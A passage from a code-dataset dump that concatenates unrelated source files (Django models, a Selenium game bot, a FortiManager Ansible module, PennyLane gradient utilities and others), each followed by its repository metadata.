return qs_one.union(qs_two).order_by('created_at') # 取并集后按时间排序,结果时QuerySet
def get_most_recent_conversation(self, recipient):
"""获取最近一次私信互动的用户"""
try:
qs_sent = self.filter(sender=recipient) # 当前登录用户发送的消息
qs_received = self.filter(recipient=recipient) # 当前登录用户接收的消息
qs = qs_sent.union(qs_received).latest("created_at") # 最后一条消息
if qs.sender == recipient:
# 如果登录用户有发送消息,返回消息的接收者
return qs.recipient
# 否则返回消息的发送者
return qs.sender
except self.model.DoesNotExist:
# 如果模型实例不存在,则返回当前用户
return get_user_model().objects.get(username=recipient.username)
class Message(models.Model):
"""用户间私信"""
uuid_id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
sender = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='sent_messages', blank=True, null=True,
on_delete=models.SET_NULL, verbose_name='发送者')
recipient = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='received_messages', blank=True, null=True,
on_delete=models.SET_NULL, verbose_name='接受者')
message = models.TextField(blank=True, null=True, verbose_name='内容')
unread = models.BooleanField(default=True, verbose_name='是否未读') # True未读
created_at = models.DateTimeField(db_index=True, auto_now_add=True,
verbose_name='创建时间') # 没有updated_at,私信发送之后不能修改或撤回
objects = MessageQuerySet.as_manager()
class Meta:
verbose_name = '私信'
verbose_name_plural = verbose_name
ordering = ('-created_at',)
def __str__(self):
return self.message
def mark_as_read(self):
if self.unread:
self.unread = False
self.save()
| [
"xlyjxkk@gmail.com"
] | xlyjxkk@gmail.com |
0d5b9fa22ce5bdb993ac375103383a9c6ba6c959 | 167c6226bc77c5daaedab007dfdad4377f588ef4 | /python/ql/test/2/library-tests/modules/general/package/__init__.py | d5be97cd18230f5a4a71a5e875574face58adfb1 | [
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] | permissive | github/codeql | 1eebb449a34f774db9e881b52cb8f7a1b1a53612 | d109637e2d7ab3b819812eb960c05cb31d9d2168 | refs/heads/main | 2023-08-20T11:32:39.162059 | 2023-08-18T14:33:32 | 2023-08-18T14:33:32 | 143,040,428 | 5,987 | 1,363 | MIT | 2023-09-14T19:36:50 | 2018-07-31T16:35:51 | CodeQL | UTF-8 | Python | false | false | 213 | py |
a = 1
b = 2
c = 3
#Implicit relative import
from helper import d
#Explicit relative import
from .helper import g
from .assistant import f
#This will be an implicit relative import (in Python 2)
import helper
| [
"mark@hotpy.org"
] | mark@hotpy.org |
ac83d2dffda56e4aa58e5269ad131cf6fc0edd88 | cc9a87e975546e2ee2957039cceffcb795850d4f | /venv/bin/pip | 5d0b1e4937781dd43907661fd781a3862fbd0277 | [] | no_license | CodeHunterDev/Belajar-Python | 304d3243801b91b3605d2b9bd09e49a30735e51b | 9dd2ffb556eed6b2540da19c5f206fedb218ae99 | refs/heads/master | 2023-03-19T22:12:46.330272 | 2020-02-04T08:02:00 | 2020-02-04T08:02:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | #!/home/adam/PyCharm/HelloAdamPython/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
# Copyright (c) 2020. Adam Arthur Faizal
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"adam.faizal.af6@gmail.com"
] | adam.faizal.af6@gmail.com | |
33762bb875c6b2c49a26c4748aa607e6b82072fc | 5f203dc298a40d47835882b9c3b37e93ebc015d6 | /mf/python/mknfold.py | 22c45920a9b53331b02fad5295461d2269f483b1 | [] | no_license | chan-y-park/ML-SGHMC | 6489e7f2808b849983d2b970bc2c471a61cd8a3f | 92d555b7360060eb452efd72e4493dac39412021 | refs/heads/master | 2020-05-07T18:18:13.601213 | 2019-04-15T06:58:20 | 2019-04-15T06:58:20 | 180,761,444 | 0 | 0 | null | 2019-04-11T09:41:04 | 2019-04-11T09:41:04 | null | UTF-8 | Python | false | false | 798 | py | #!/usr/bin/python
import sys
import random
if __name__ == '__main__':
if len(sys.argv) < 3:
print 'usage: <input> <fold> [nfold=5]'
exit(-1)
if len( sys.argv ) > 3:
nfold = int( sys.argv[3] )
else:
nfold = 5
fold = int( sys.argv[2] )
assert fold > 0 and fold <= nfold
random.seed( 0 )
fo = open( 'fold%d.txt' % fold, 'w' )
for l in open( sys.argv[1] ):
arr = l.split()
uid,iid, sc = int(arr[0]),int(arr[1]), float(arr[2])
if random.randint( 1, nfold ) == fold:
# test is 1
ngf = 1
else:
ngf = 0
fo.write('%f\t%d\t1\t1\t' % (sc, ngf ) )
if ngf != 0:
fo.write('0:0 ')
fo.write('%d:1 %d:1\n' %(uid,iid))
fo.close()
| [
"tianqi.tchen@gmail.com"
] | tianqi.tchen@gmail.com |
8db6e99710b0007055e3d7632b4842e47cc1c628 | 2b358820cb483cb73842f6b5c3fa4de5ff0d537a | /build/rviz_plugin_covariance/catkin_generated/pkg.develspace.context.pc.py | 686ad90ee3512882d5e1b9240485a1b2508a51d2 | [] | no_license | jrr1984/tp_final_omni | bf2803b75c5713c8e91a46126f0e281efcdca813 | 10ffb784397025839cc7cbd57d5991a1fbf32367 | refs/heads/master | 2021-06-06T01:59:57.602069 | 2021-05-08T19:13:30 | 2021-05-08T19:13:30 | 127,978,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rviz_plugin_covariance"
PROJECT_SPACE_DIR = "/home/juan/catkin_ws/devel/.private/rviz_plugin_covariance"
PROJECT_VERSION = "0.1.0"
| [
"juanreto@gmail.com"
] | juanreto@gmail.com |
12e1b5d0adfaa938385583586815b054f90b1494 | 6c92a0d1cf4e79a1f7a5d883184b397625e957be | /Day048/Cookie Clicker Practice.py | 880b23f9cad787f17b60b491ebd65386da0da3ef | [] | no_license | Hasib104/Learning-Python | 5667c52e98812da36275412a481298f4b38f8099 | 0f731624fb6572fdfbb0d09d2aa1ffb3d3247796 | refs/heads/main | 2023-03-26T18:33:35.168018 | 2021-03-18T13:25:36 | 2021-03-18T13:25:36 | 327,512,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,463 | py |
from selenium import webdriver
import time
chrome_driver_path = "C:\Development\chromedriver.exe"
driver = webdriver.Chrome(chrome_driver_path)
driver.get("http://orteil.dashnet.org/experiments/cookie/")
# Get cookie to click on.
cookie = driver.find_element_by_id("cookie")
# Get upgrade item ids.
items = driver.find_elements_by_css_selector("#store div")
item_ids = [item.get_attribute("id") for item in items]
#print(item_ids)
timeout = time.time() + 3
five_min = time.time() + 60 * 5
while True:
cookie.click()
#finding money and making is int()
money = driver.find_element_by_css_selector("#game #money")
money_text_int = int(money.text)
#print(money_text_int)
prices = []
if time.time() > timeout:
#finding all the prices for upgrades
finding_all_prices_tag = driver.find_elements_by_css_selector("#store b")
#splitting the prices from names
for price in finding_all_prices_tag:
all_prices_tag_text = price.text
if all_prices_tag_text != "":
just_price_int = int(all_prices_tag_text.split("-")[1].strip().replace(",", ""))
prices.append(just_price_int)
#print(prices)
#making a dictionary for upgrades price : id
cookie_upgrades = {}
for i in range(len(prices)):
cookie_upgrades[prices[i]] = item_ids[i]
#print(cookie_upgrades)
#making a dictionary for affordable upgrades
# affordable_upgrades = {}
# for cost, id in cookie_upgrades.items():
# if money_text_int > cost:
# affordable_upgrades[cost] = id
# #print(affordable_upgrades)
affordable_upgrades = {cost:id for (cost,id) in cookie_upgrades.items() if money_text_int > cost}
#buying the highest upgrade
highest_upgrade = max(affordable_upgrades)
highest_upgrade_id = affordable_upgrades[highest_upgrade]
driver.find_element_by_id(highest_upgrade_id).click()
#adding a timeout so that the code doesnt crash(highest_upgrade = max(affordable_upgrades) \nValueError: max() arg is an empty sequence), this helps the game's score to increase.
timeout = time.time() + 3
if time.time() > five_min:
cps = driver.find_element_by_css_selector("#game #cps").text
print(cps)
break
| [
"noreply@github.com"
] | Hasib104.noreply@github.com |
fdc4ec77c6a13586c430aa41fa72288ca3ad27f2 | 07e3e716cd5ae33f5c88c40ede090645a723db9f | /backend/home/migrations/0002_load_initial_data.py | 7626e1b98d0c44979567332c51672739b0aef63f | [] | no_license | crowdbotics-apps/dating-22486 | bb8886a455d581b0c27cef8395c8369bc85fae72 | 1bb68c3095ffc29e5cd330cf426b9b1e35c2c360 | refs/heads/master | 2023-01-06T16:43:18.990380 | 2020-11-10T19:00:28 | 2020-11-10T19:00:28 | 311,755,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,278 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "dating"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">dating</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "dating-22486.botics.co"
site_params = {
"name": "dating",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4752f1bf9ae6ca9a6d4829ac7312e28b36909a17 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/TileCalorimeter/TileConditions/share/convertTimingResiduals.py | a83e68743fe1d4bb285589af690757802de92f78 | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,343 | py | #!/usr/bin/env python
import sys
#
#__________________________________________________________________
def dec2hex(n):
return ("0%X" % n)[-2:]
#
#__________________________________________________________________
def pmt2channel_LB(pmtOrChannel):
"""
This function converts channel to pmt or pmt to channel number.
Valid for Barrel only!
"""
pmtOrChannel = int(pmtOrChannel)
channelOrPmt = pmtOrChannel;
# pmt==channel for pmt 0 - 23
# pmt 24 - 47: reverse in groups of 3
if pmtOrChannel>23:
mod = pmtOrChannel%3
if mod==0: channelOrPmt = pmtOrChannel+2
elif mod==2: channelOrPmt = pmtOrChannel-2
else : pass
return channelOrPmt
#
#__________________________________________________________________
modToFrag = {'LBA' : '0x1',
'LBC' : '0x2',
'EBA' : '0x3',
'EBC' : '0x4'}
inFile = sys.argv[1]
tdlas = ""
tclas = ""
lines = open(inFile,"r").readlines()
for line in lines:
field = line.split()
if not len(field): continue
module = field[0][:3]
modNum = int(field[0][3:]) - 1
drawerOffset = float(field[1])
chanOffsets = field[2:]
hexModule = modToFrag[module] + dec2hex(modNum)
#=== some sanity checks
sum=0.
for chan in xrange(6):
add = float(chanOffsets[chan])
sum += add
print "%s ---> Found %i channels, sum of first 6 is %f" % ( field[0] , len(chanOffsets) , sum )
#====================================================
#=== fill tdlas (channel is always 0)
#====================================================
tdlas = tdlas+ "Tdlas\t%s\t0\t%s\n" % (hexModule,drawerOffset)
#====================================================
#=== fill tclas
#====================================================
for chan in xrange(48):
offset = chanOffsets[chan]
tclas = tclas+"Tclas\t%s\t%i\t%s\t%s\n" % (hexModule,chan,offset,offset)
tdlasFile = open("Tile.tdlas","w")
tdlasFile.write(tdlas)
tdlasFile.close()
tclasFile = open("Tile.tclas","w")
tclasFile.write(tclas)
tclasFile.close()
# print "---------------TDLAS--------------------------"
# print tdlas
# print "---------------TDLAS--------------------------"
# print "---------------TCLAS--------------------------"
# print tclas
# print "---------------TCLAS--------------------------"
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
25b411769db49eeb1daa8e3f8b2a2e386e5fe43f | c5a1c95e9d8ce937f71caf8340cf11fe98e64f56 | /day10(주말용)/problem1/[이재형] 내적.py | 02fda70a817433911e1f4e125aee46026c8811d4 | [] | no_license | Boot-Camp-Coding-Test/Programmers | 963e5ceeaa331d99fbc7465f7b129bd68e96eae3 | 83a4b62ba2268a47859a6ce88ae1819bc96dcd85 | refs/heads/main | 2023-05-23T08:21:57.398594 | 2021-06-12T16:39:21 | 2021-06-12T16:39:21 | 366,589,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | def solution(a, b):
return sum([a[i]*b[i] for i in range(len(a))])
| [
"noreply@github.com"
] | Boot-Camp-Coding-Test.noreply@github.com |
cfa0e6c206169e8e5fed6ab2f5e5178f1c1e0c4f | fa52ee094776f69f0214ffbe24281a9736eaaa40 | /solutions/114_Flatten_Binary_Tree_to_Linked_List_1.py | b41a2f5011b771075bb35a38a3f043abb3f56591 | [] | no_license | hank08tw/CodeFromLeetcode | 57898916c2b903b1ecbc3d0ed063b36531d74e93 | 41b2936600dd392627a4f6e146559739bb88da45 | refs/heads/master | 2021-05-03T04:26:28.239904 | 2015-06-07T17:31:06 | 2015-06-07T17:31:06 | 120,615,373 | 1 | 0 | null | 2018-02-07T12:58:40 | 2018-02-07T12:58:39 | null | UTF-8 | Python | false | false | 615 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param {TreeNode} root
# @return {void} Do not return anything, modify root in-place instead.
def flatten(self, root):
stack = []
p = root
while p != None or stack:
if p.right:
stack.append(p.right)
if p.left:
p.right = p.left
p.left = None
elif stack:
p.right = stack.pop()
p = p.right | [
"yao.zhao9101@gmail.com"
] | yao.zhao9101@gmail.com |
0cae18a0b4188b84fe1ab8042cdc71443356abbe | 81c344b8df43ed550cb9496c664a8de2687eda3e | /venv/lib/python3.8/site-packages/ansible_collections/fortinet/fortimanager/plugins/modules/fmgr_antivirus_profile.py | 333628df60a3061b91a0b9e48611252ed8864ca9 | [] | no_license | anhdoan-ntt/cisco-aci | dc0e52b6d19ee0bafb2b24e0febe955952bf39ef | 185be6d6f13eabd65fb0ff328ea54f6507ccf0d4 | refs/heads/main | 2022-12-20T00:07:27.465096 | 2020-10-05T08:15:29 | 2020-10-05T08:15:29 | 300,500,699 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,249 | py | #!/usr/bin/python
from __future__ import absolute_import, division, print_function
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fmgr_antivirus_profile
short_description: Configure AntiVirus profiles.
description:
- This module is able to configure a FortiManager device by allowing the
user to [ add get set update ] the following apis.
- /pm/config/adom/{adom}/obj/antivirus/profile
- /pm/config/global/obj/antivirus/profile
- Examples include all parameters and values need to be adjusted to data sources before usage.
version_added: "2.10"
author:
- Frank Shen (@fshen01)
- Link Zheng (@zhengl)
notes:
- There are only three top-level parameters where 'method' is always required
while other two 'params' and 'url_params' can be optional
- Due to the complexity of fortimanager api schema, the validation is done
out of Ansible native parameter validation procedure.
- The syntax of OPTIONS doen not comply with the standard Ansible argument
specification, but with the structure of fortimanager API schema, we need
a trivial transformation when we are filling the ansible playbook
options:
loose_validation:
description:
- Do parameter validation in a loose way
type: bool
required: false
workspace_locking_adom:
description:
- the adom name to lock in case FortiManager running in workspace mode
- it can be global or any other custom adom names
required: false
type: str
workspace_locking_timeout:
description:
- the maximum time in seconds to wait for other user to release the workspace lock
required: false
type: int
default: 300
method:
description:
- The method in request
required: true
type: str
choices:
- add
- get
- set
- update
params:
description:
- The parameters for each method
- See full parameters list in https://ansible-galaxy-fortimanager-docs.readthedocs.io/en/latest
type: list
required: false
url_params:
description:
- The parameters for each API request URL
- Also see full URL parameters in https://ansible-galaxy-fortimanager-docs.readthedocs.io/en/latest
required: false
type: dict
'''
EXAMPLES = '''
- hosts: fortimanager-inventory
collections:
- fortinet.fortimanager
connection: httpapi
vars:
ansible_httpapi_use_ssl: True
ansible_httpapi_validate_certs: False
ansible_httpapi_port: 443
tasks:
- name: REQUESTING /PM/CONFIG/OBJ/ANTIVIRUS/PROFILE
fmgr_antivirus_profile:
loose_validation: False
workspace_locking_adom: <value in [global, custom adom]>
workspace_locking_timeout: 300
method: <value in [add, set, update]>
url_params:
adom: <value in [none, global, custom dom]>
params:
-
data:
-
analytics-bl-filetype: <value of string>
analytics-db: <value in [disable, enable]>
analytics-max-upload: <value of integer>
analytics-wl-filetype: <value of string>
av-block-log: <value in [disable, enable]>
av-virus-log: <value in [disable, enable]>
comment: <value of string>
extended-log: <value in [disable, enable]>
ftgd-analytics: <value in [disable, suspicious, everything]>
inspection-mode: <value in [proxy, flow-based]>
mobile-malware-db: <value in [disable, enable]>
name: <value of string>
replacemsg-group: <value of string>
scan-mode: <value in [quick, full]>
- name: REQUESTING /PM/CONFIG/OBJ/ANTIVIRUS/PROFILE
fmgr_antivirus_profile:
loose_validation: False
workspace_locking_adom: <value in [global, custom adom]>
workspace_locking_timeout: 300
method: <value in [get]>
url_params:
adom: <value in [none, global, custom dom]>
params:
-
attr: <value of string>
fields:
-
- <value in [analytics-bl-filetype, analytics-db, analytics-max-upload, ...]>
filter:
- <value of string>
get used: <value of integer>
loadsub: <value of integer>
option: <value in [count, object member, datasrc, ...]>
range:
- <value of integer>
sortings:
-
varidic.attr_name: <value in [1, -1]>
'''
RETURN = '''
url:
description: The full url requested
returned: always
type: str
sample: /sys/login/user
status:
description: The status of api request
returned: always
type: dict
data:
description: The payload returned in the request
type: dict
returned: always
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FAIL_SOCKET_MSG
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import DEFAULT_RESULT_OBJ
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FMGRCommon
from ansible_collections.fortinet.fortimanager.plugins.module_utils.common import FMGBaseException
from ansible_collections.fortinet.fortimanager.plugins.module_utils.fortimanager import FortiManagerHandler
def main():
jrpc_urls = [
'/pm/config/adom/{adom}/obj/antivirus/profile',
'/pm/config/global/obj/antivirus/profile'
]
url_schema = [
{
'name': 'adom',
'type': 'string'
}
]
body_schema = {
'schema_objects': {
'object0': [
{
'name': 'data',
'api_tag': 0,
'type': 'array',
'items': {
'analytics-bl-filetype': {
'type': 'string'
},
'analytics-db': {
'type': 'string',
'enum': [
'disable',
'enable'
]
},
'analytics-max-upload': {
'type': 'integer'
},
'analytics-wl-filetype': {
'type': 'string'
},
'av-block-log': {
'type': 'string',
'enum': [
'disable',
'enable'
]
},
'av-virus-log': {
'type': 'string',
'enum': [
'disable',
'enable'
]
},
'comment': {
'type': 'string'
},
'extended-log': {
'type': 'string',
'enum': [
'disable',
'enable'
]
},
'ftgd-analytics': {
'type': 'string',
'enum': [
'disable',
'suspicious',
'everything'
]
},
'inspection-mode': {
'type': 'string',
'enum': [
'proxy',
'flow-based'
]
},
'mobile-malware-db': {
'type': 'string',
'enum': [
'disable',
'enable'
]
},
'name': {
'type': 'string'
},
'replacemsg-group': {
'type': 'string'
},
'scan-mode': {
'type': 'string',
'enum': [
'quick',
'full'
]
}
}
},
{
'type': 'string',
'name': 'url',
'api_tag': 0
}
],
'object1': [
{
'type': 'string',
'name': 'attr',
'api_tag': 0
},
{
'name': 'fields',
'api_tag': 0,
'type': 'array',
'items': {
'type': 'array',
'items': {
'type': 'string',
'enum': [
'analytics-bl-filetype',
'analytics-db',
'analytics-max-upload',
'analytics-wl-filetype',
'av-block-log',
'av-virus-log',
'comment',
'extended-log',
'ftgd-analytics',
'inspection-mode',
'mobile-malware-db',
'name',
'replacemsg-group',
'scan-mode'
]
}
}
},
{
'name': 'filter',
'type': 'dict',
'dict': {
'type': 'array',
'items': {
'type': 'string',
'example': [
'<attr>',
'==',
'test'
]
}
},
'api_tag': 0
},
{
'type': 'integer',
'name': 'get used',
'api_tag': 0
},
{
'type': 'integer',
'name': 'loadsub',
'api_tag': 0
},
{
'name': 'option',
'type': 'dict',
'dict': {
'type': 'string',
'enum': [
'count',
'object member',
'datasrc',
'get reserved',
'syntax'
]
},
'api_tag': 0
},
{
'name': 'range',
'type': 'dict',
'dict': {
'type': 'array',
'items': {
'type': 'integer',
'example': [
2,
5
]
}
},
'api_tag': 0
},
{
'name': 'sortings',
'type': 'dict',
'dict': {
'type': 'array',
'items': {
'{attr_name}': {
'type': 'integer',
'enum': [
1,
-1
]
}
}
},
'api_tag': 0
},
{
'type': 'string',
'name': 'url',
'api_tag': 0
}
]
},
'method_mapping': {
'add': 'object0',
'get': 'object1',
'set': 'object0',
'update': 'object0'
}
}
module_arg_spec = {
'loose_validation': {
'type': 'bool',
'required': False,
'default': False
},
'workspace_locking_adom': {
'type': 'str',
'required': False
},
'workspace_locking_timeout': {
'type': 'int',
'required': False,
'default': 300
},
'params': {
'type': 'list',
'required': False
},
'method': {
'type': 'str',
'required': True,
'choices': [
'add',
'get',
'set',
'update'
]
},
'url_params': {
'type': 'dict',
'required': False
}
}
module = AnsibleModule(argument_spec=module_arg_spec,
supports_check_mode=False)
method = module.params['method']
loose_validation = module.params['loose_validation']
fmgr = None
payload = None
response = DEFAULT_RESULT_OBJ
if module._socket_path:
connection = Connection(module._socket_path)
tools = FMGRCommon()
if loose_validation is False:
tools.validate_module_params(module, body_schema)
tools.validate_module_url_params(module, jrpc_urls, url_schema)
full_url = tools.get_full_url_path(module, jrpc_urls)
payload = tools.get_full_payload(module, full_url)
fmgr = FortiManagerHandler(connection, module)
fmgr.tools = tools
else:
module.fail_json(**FAIL_SOCKET_MSG)
try:
response = fmgr._conn.send_request(method, payload)
fmgr.govern_response(module=module, results=response,
msg='Operation Finished',
ansible_facts=fmgr.construct_ansible_facts(response, module.params, module.params))
except Exception as e:
raise FMGBaseException(e)
module.exit_json(meta=response[1])
if __name__ == '__main__':
main()
| [
"dc.anh.doan@gmail.com"
] | dc.anh.doan@gmail.com |
3f2546636e7e7b9abb20725f5c413bb9d72a55f2 | e27d6cf969bc1e12f61fcf09aa5cab211744e352 | /TerrainData/classifyNB.py | 1ffa57f0132f34baa276949992356aea8eb34850 | [] | no_license | bnajafi/Gaussian_Naive_Bayes_SKLearn | 6fd2ed0e43020ca86f4c8ca8946c630b0dd719ba | d064ec4665e35d178960a3afd2fade02fb7ba118 | refs/heads/master | 2021-01-20T20:47:32.812728 | 2017-06-12T11:04:54 | 2017-06-12T11:04:54 | 64,767,625 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | def classify(features_train, labels_train):
### import the sklearn module for GaussianNB
from sklearn.naive_bayes import GaussianNB
### create classifier
clf= GaussianNB()
### fit the classifier on the training features and labels
clf.fit(features_train,labels_train)
### return the fit classifier
return clf
### your code goes here!
| [
"behzad najafi"
] | behzad najafi |
56b9b013459a210acff98b7470550bbd6915a1d0 | 7c0d8d030c27472c3cdd3f5696fb423f7cb579af | /pennylane/gradients/gradient_transform.py | f9536c451198d537395f243393cfb28d00a86d28 | [
"Apache-2.0"
] | permissive | stjordanis/pennylane | 6a696914244336cdad4d68bbcc668924eeaf1bf6 | 755b2419ea2e956d864237b9b18f3a3ca27cdf4f | refs/heads/master | 2023-05-10T23:10:56.891830 | 2023-05-03T21:09:32 | 2023-05-03T21:09:32 | 175,742,678 | 1 | 0 | null | 2019-03-15T03:32:26 | 2019-03-15T03:32:25 | null | UTF-8 | Python | false | false | 17,633 | py | # Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains utilities for defining custom gradient transforms,
including a decorator for specifying gradient expansions."""
# pylint: disable=too-few-public-methods
import warnings
import pennylane as qml
from pennylane.transforms.tape_expand import expand_invalid_trainable
SUPPORTED_GRADIENT_KWARGS = [
"approx_order",
"argnum",
"aux_wire",
"broadcast", # [TODO: This is in param_shift. Unify with use_broadcasting in stoch_pulse_grad
"device_wires",
"diagonal_shifts",
"f0",
"force_order2",
"gradient_recipes",
"gradient_kwargs",
"h",
"n",
"num",
"num_directions",
"num_split_times",
"off_diagonal_shifts",
"order",
"reduction",
"sampler",
"sampler_seed",
"shifts",
"shots",
"strategy",
"use_broadcasting",
"validate_params",
]
def gradient_analysis(tape, use_graph=True, grad_fn=None):
"""Update the parameter information dictionary of the tape with
gradient information of each parameter.
Parameter gradient methods include:
* ``None``: the parameter does not support differentiation.
* ``"0"``: the variational circuit output does not depend on this
parameter (the partial derivative is zero).
In addition, the operator might define its own grad method
via :attr:`.Operator.grad_method`.
Note that this function modifies the input tape in-place.
Args:
tape (.QuantumTape): the quantum tape to analyze
use_graph (bool): whether to use a directed-acyclic graph to determine
if the parameter has a gradient of 0
grad_fn (None or callable): The gradient transform performing the analysis.
This is an optional argument; if provided, and the tape has already
been analyzed for the gradient information by the same gradient transform,
the cached gradient analysis will be used.
"""
# pylint:disable=protected-access
if grad_fn is not None:
if getattr(tape, "_gradient_fn", None) is grad_fn:
# gradient analysis has already been performed on this tape
return
tape._gradient_fn = grad_fn
for idx, info in enumerate(tape._par_info):
if idx not in tape.trainable_params:
# non-trainable parameters do not require a grad_method
info["grad_method"] = None
else:
op = tape._par_info[idx]["op"]
if not qml.operation.has_grad_method(op):
# no differentiation method is registered for this operation
info["grad_method"] = None
elif (tape._graph is not None) or use_graph:
if not any(tape.graph.has_path(op, ob) for ob in tape.observables):
# there is no influence of this operation on any of the observables
info["grad_method"] = "0"
continue
info["grad_method"] = op.grad_method
def grad_method_validation(method, tape):
"""Validates if the gradient method requested is supported by the trainable
parameters of a tape, and returns the allowed parameter gradient methods.
This method will generate parameter gradient information for the given tape if it
has not already been generated, and then proceed to validate the gradient method.
In particular:
* An exception will be raised if there exist non-differentiable trainable
parameters on the tape.
* An exception will be raised if the Jacobian method is ``"analytic"`` but there
exist some trainable parameters on the tape that only support numeric differentiation.
If all validations pass, this method will return a tuple containing the allowed parameter
gradient methods for each trainable parameter.
Args:
method (str): the overall Jacobian differentiation method
tape (.QuantumTape): the tape with associated parameter information
Returns:
tuple[str, None]: the allowed parameter gradient methods for each trainable parameter
"""
diff_methods = {
idx: info["grad_method"]
for idx, info in enumerate(tape._par_info) # pylint: disable=protected-access
if idx in tape.trainable_params
}
# check and raise an error if any parameters are non-differentiable
nondiff_params = {idx for idx, g in diff_methods.items() if g is None}
if nondiff_params:
raise ValueError(f"Cannot differentiate with respect to parameter(s) {nondiff_params}")
numeric_params = {idx for idx, g in diff_methods.items() if g == "F"}
# If explicitly using analytic mode, ensure that all parameters
# support analytic differentiation.
if method == "analytic" and numeric_params:
raise ValueError(
f"The analytic gradient method cannot be used with the parameter(s) {numeric_params}."
)
return tuple(diff_methods.values())
def choose_grad_methods(diff_methods, argnum):
"""Chooses the trainable parameters to use for computing the Jacobian
by returning a map of their indices and differentiation methods.
When there are fewer parameters specified than the total number of
trainable parameters, the Jacobian is estimated by using the parameters
specified using the ``argnum`` keyword argument.
Args:
diff_methods (list): the ordered list of differentiation methods
for each parameter
argnum (int, list(int), None): Indices for argument(s) with respect
to which to compute the Jacobian.
Returns:
dict: map of the trainable parameter indices and
differentiation methods
"""
if argnum is None:
return dict(enumerate(diff_methods))
if isinstance(argnum, int):
argnum = [argnum]
num_params = len(argnum)
if num_params == 0:
warnings.warn(
"No trainable parameters were specified for computing the Jacobian.",
UserWarning,
)
return {}
return {idx: diff_methods[idx] for idx in argnum}
class gradient_transform(qml.batch_transform):
"""Decorator for defining quantum gradient transforms.
Quantum gradient transforms are a specific case of :class:`~.batch_transform`.
All quantum gradient transforms accept a tape, and output
a batch of tapes to be independently executed on a quantum device, alongside
a post-processing function that returns the result.
Args:
expand_fn (function): An expansion function (if required) to be applied to the
input tape before the gradient computation takes place. If not provided,
the default expansion function simply expands all operations that
have ``Operation.grad_method=None`` until all resulting operations
have a defined gradient method.
differentiable (bool): Specifies whether the gradient transform is differentiable or
not. A transform may be non-differentiable if it does not use an
autodiff framework for its tensor manipulations. In such a case, setting
``differentiable=False`` instructs the decorator
to mark the output as 'constant', reducing potential overhead.
hybrid (bool): Specifies whether classical processing inside a QNode
should be taken into account when transforming a QNode.
- If ``True``, and classical processing is detected and this
